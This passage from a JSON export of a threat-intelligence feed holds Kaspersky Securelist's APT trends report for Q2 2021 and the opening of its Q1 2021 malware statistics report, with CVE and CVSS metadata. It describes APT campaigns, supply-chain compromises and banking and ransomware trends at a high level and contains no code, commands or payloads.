"CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-08-12T10:00:37", "id": "SECURELIST:934E8AA177A27150B87EC15F920BF350", "href": "https://securelist.com/it-threat-evolution-q2-2021/103597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-04T10:41:58", "description": "\n\nFor more than four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q2 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nInvestigating the recent Microsoft Exchange vulnerabilities we and our colleagues from AMR found an attacker deploying a previously unknown backdoor, "FourteenHi", in a campaign that we dubbed ExCone, active since mid-March. During our investigation we revealed multiple tools and variants of FourteenHi, configured with infrastructure that FireEye reported as being related to the UNC2643 activity cluster. Moreover, we saw ShadowPad detections coincide with FourteenHi variant infections, possibly hinting at a shared operator between these two malware families.\n\nFourteenHi abuses the popular VLC media player to execute its loader. It is capable of performing basic backdoor functions. 
Further investigation also revealed scripts used by the actor to gain situational awareness post-exploitation, as well as previous use of the infrastructure to operate Cobalt Strike Beacon.\n\nAlthough we couldn't directly attribute this activity to any known threat actor, we found older, highly similar 64-bit samples of the backdoor used in close proximity with ShadowPad malware, mostly known for its operations involving supply-chain attacks as an infection vector. Notably, we also found one C2 IP used in a 64-bit sample reportedly used in the UNC2643 activity set, associated with the HAFNIUM threat actor, also using Cobalt Strike, DLL side-loading and exploiting the same Exchange vulnerabilities.\n\n## Russian-speaking activity\n\nOn May 27 and 28, details regarding an ongoing email campaign against diplomatic entities throughout Europe and North America were released by Volexity and Microsoft. These attacks were attributed to Nobelium and APT29 by Microsoft and Volexity respectively. While we were able to verify the malware and possible targeting for this cluster of activity, we haven't been able to make a definitive assessment at this time about which threat actor is responsible, although we found ties to Kazuar. We have designated it as a new threat actor and named it "HotCousin". The attacks began with a spear-phishing email which led to an ISO file container being stored on disk and mounted. From here, the victim was presented with a LNK file made to look like a folder within an Explorer window. If the victim double clicked on it, the LNK then executed a loader written in .NET referred to as BoomBox, or a DLL. The execution chain ultimately ended with a Cobalt Strike beacon payload being loaded into memory. According to public blogs, targeting was widespread but focused primarily on diplomatic entities throughout Europe and North America: based on the content of the lure documents bundled with the malware, this assessment appears to be accurate. 
This cluster of activity was conducted methodically beginning in January with selective targeting and slow operational pace, then ramping up and ending in May. There are indications of previous activity from this threat actor dating back to at least October 2020, based on other Cobalt Strike payloads and loaders bearing similar toolmarks.\n\n## Chinese-speaking activity\n\nWhile investigating a recent rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers. The former is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open source project named "Cheat Engine" to bypass the Windows Driver Signature Enforcement mechanism. We were able to determine that this toolset had been in use from as early as July 2020; and that the threat actor was mostly focused on Southeast Asian targets, including several governmental entities and telecoms companies. Since this was a long-standing operation, with high-profile victims, an advanced toolset and no affinity to a known threat actor, we decided to name the underlying cluster "GhostEmperor".\n\nAPT31 (aka ZIRCONIUM) is a Chinese-speaking intrusion set. This threat actor set up an ORB (Operational Relay Boxes) infrastructure, composed of several compromised SOHO routers, to target entities based in Europe (and perhaps elsewhere). As of the publication of our report in May, we had seen these ORBs used to relay Cobalt Strike communications and for anonymization proxying purposes. It is likely that APT31 uses them for other implants and ends as well (for example, exploit or malware staging). 
Most of the infrastructure put in place by APT31 comprises compromised Pakedge routers (RK1, RE1 and RE2). This little-known manufacturer specializes in small enterprise routers and network devices. So far, we don't know which specific vulnerability has been exploited by the intrusion set to compromise the routers. Nor do we currently possess telemetry that would provide further visibility into this campaign. We will, of course, continue to track these activities.\n\nFollowing our previous report on EdwardsPheasant, DomainTools and BitDefender published articles about malicious activities against targets in Southeast Asia which we believe, with medium to high confidence, are parts of EdwardsPheasant campaigns. While tracking the activities of this threat actor, analyzing samples discovered or provided by third parties, and investigating from public IoCs, we discovered an updated DropPhone implant, an additional implant loaded by FoundCore's shellcode, several possible new infection documents and malicious domain names, as well as additional targets. While we do not believe we have a complete picture of this set of activities yet, our report this quarter marks a significant step further in understanding its extent.\n\nA Chinese-speaking APT compromised a certificate authority in Mongolia and replaced digital certificate management client software with a malicious downloader in February. We are tracking this group as BountyGlad. Related infrastructure was identified and used in multiple other incidents: interesting related activity included server-side attacks on WebSphere and WebLogic services in Hong Kong; and on the client-side, Trojanized Flash Player installers. The group demonstrated an increase in strategic sophistication with this supply-chain attack. While replacing a legitimate installer on a high value website like a certificate authority requires a medium level of skill and coordination, the technical sophistication is not on par with ShadowHammer. 
And while the group deploys fairly interesting, but simplistic, steganography to cloak its shellcode, we think it was probably generated with code that has been publicly available for years. Previous activity also connected with this group relied heavily on spear-phishing and Cobalt Strike throughout 2020. Some activity involved PowerShell commands and loader variants different from the downloaders presented in our recent report. In addition to spear-phishing, the group appears to rely on publicly available exploits to penetrate unpatched target systems. They use implants and C2 (Command and Control) code that are a mix of both publicly available and privately shared across multiple Chinese-speaking APTs. We are able to connect infrastructure across multiple incidents. Some of those were focused on Western targets in 2020. Some of the infrastructure listed in an FBI Flash alert published in May 2020, targeting US organizations conducting COVID-19 research, was also used by BountyGlad.\n\nWhile investigating users infected with the TPCon backdoor, previously discussed in a private report, we detected loaders which are part of a new multi-plugin malware framework that we named "QSC", which allows attackers to load and run plugins in-memory. We attribute the use of this framework to Chinese-speaking groups, based on some overlaps in victimology and infrastructure with other known tools used by these groups. We have so far observed the malware loading a Command shell and File Manager plugins in-memory. We believe the framework has been used in the wild since April 2020, based on the compilation timestamp of the oldest sample found. However, our telemetry suggests that the framework is still in use: the latest activity we detected was in March this year.\n\nEarlier this month, Rostelecom Solar and NCIRCC issued a joint public report describing a series of attacks against networks of government entities in Russia. 
The report described a formerly unknown actor leveraging an infection chain that leads to the deployment of two implants - WebDav-O and Mail-O. Those, in conjunction with other post-exploitation activity, have led to network-wide infections in the targeted organizations that resulted in exfiltration of sensitive data. We were able to trace the WebDav-O implant's activity in our telemetry to at least 2018, indicating government affiliated targets based in Belarus. Based on our investigation, we were able to find additional variants of the malware and observe some of the commands executed by the attackers on the compromised machines.\n\nWe discovered a cluster of activity targeting telecom operators within a specific region. The bulk of this activity took place from May to October 2020. This activity made use of several malware families and tools; but the infrastructure, a staging directory, and in-country target profiles tie them together. The actors deployed a previously unknown passive backdoor, that we call "TPCon", as a primary implant. It was later used to perform both reconnaissance within target organizations and to deploy a post-compromise toolset made up mostly of publicly available tools. We also found other previously unknown active backdoors, that we call "evsroin", used as secondary implants. Another interesting find was a related loader (found in a staging directory) that loaded a KABA1 implant variant. KABA1 was an implant used against targets throughout the South China Sea that we attributed to the Naikon APT back in 2016. On another note, on the affected hosts we found additional multiple malware families shared by Chinese-speaking actors, such as ShadowPad and Quarian backdoors. These did not seem to be directly connected to the TPCon/evsroin incidents because the supporting infrastructure appeared to be completely separate. One of the ShadowPad samples appears to have been detected in 2020, while the others were detected well before that, in 2019. 
Besides the Naikon tie, we found some overlaps with previously reported IceFog and IamTheKing activities.\n\n## Middle East\n\nBlackShadow is a threat group that became known after exfiltrating sensitive documents from Shirbit, an Israeli insurance company, and demanding a ransom in exchange for not releasing the information in its possession. Since then, the group has made more headlines, breaching another company in Israel and publishing a trove of documents containing customer related information on Telegram. Following this, we found several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity.\n\nWe previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. 
The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.\n\nWe discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.\n\nGoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage. 
Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanying detection logs, portrays a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.\n\n## Southeast Asia and Korean Peninsula\n\nThe ScarCruft group is a geopolitically motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chain (CVE-2020-1380 and CVE-2020-0986) also used in [Operation PowerFall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named "BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.\n\nIn May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. 
Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.\n\nBlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. 
Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.\n\nWe have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. 
This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.\n\nWe recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs point to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.\n\nWe recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data. 
Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control whether Dropbox or another, hard-coded server is used to exfiltrate stolen files.\n\n## Other interesting discoveries\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.\n\nVarious marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. 
Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we track. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system-level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nIn another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of its early activity last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. 
Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far.\n\nOn 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between the 31 January and the 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash uploader script, as well as identify some possibly associated additional malicious servers.\n\nAn e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. 
Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studios on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.\n\nA few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" (a subdomain whose DNS record still pointed at infrastructure no longer under Microsoft's control) and configured it to resolve to their Cobalt Strike host, set up around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. 
While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turn connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nOn April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. 
This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure: one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities.\n\nCooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existent organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q2 2021:\n\n * We have reported several supply-chain attacks in recent months. 
While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.\n * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.\n * APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure's macOS-supported Python malware.\n * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. 
However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T10:00:46", "type": "securelist", "title": "APT trends report Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-07-29T10:00:46", "id": "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "href": "https://securelist.com/apt-trends-report-q2-2021/103517/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-31T11:03:47", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2021:\n\n * Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.\n * 613,968,631 unique URLs were recognized as 
malicious by Web Anti-Virus components.\n * Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.\n * Ransomware attacks were defeated on the computers of 91,841 unique users.\n * Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nAt the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked the malware of such type on the computers of 118,099 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_\n\n**Attack geography**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 6.3 \n2 | Tajikistan | 5.3 \n3 | Afghanistan | 4.8 \n4 | Uzbekistan | 4.6 \n5 | Paraguay | 3.2 \n6 | Yemen | 2.1 \n7 | Costa Rica | 2.0 \n8 | Sudan | 2.0 \n9 | Syria | 1.5 \n10 | Venezuela | 1.4 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000). 
\n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\nAs before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 30.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 \n3 | Trickster | Trojan.Win32.Trickster | 7.5 \n4 | Emotet | Backdoor.Win32.Emotet | 7.4 \n5 | RTM | Trojan-Banker.Win32.RTM | 6.6 \n6 | Nimnul | Virus.Win32.Nimnul | 5.1 \n7 | Nymaim | Trojan.Win32.Nymaim | 4.7 \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 2.2 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n**New additions to the ransomware arsenal**\n\nLast year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. 
Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.\n\nREvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.\n\n**Attacks on vulnerable Exchange servers**\n\n[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector was seen being used by the Black Kingdom and DearCry families.\n\n**Publication of keys**\n\nThe developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. 
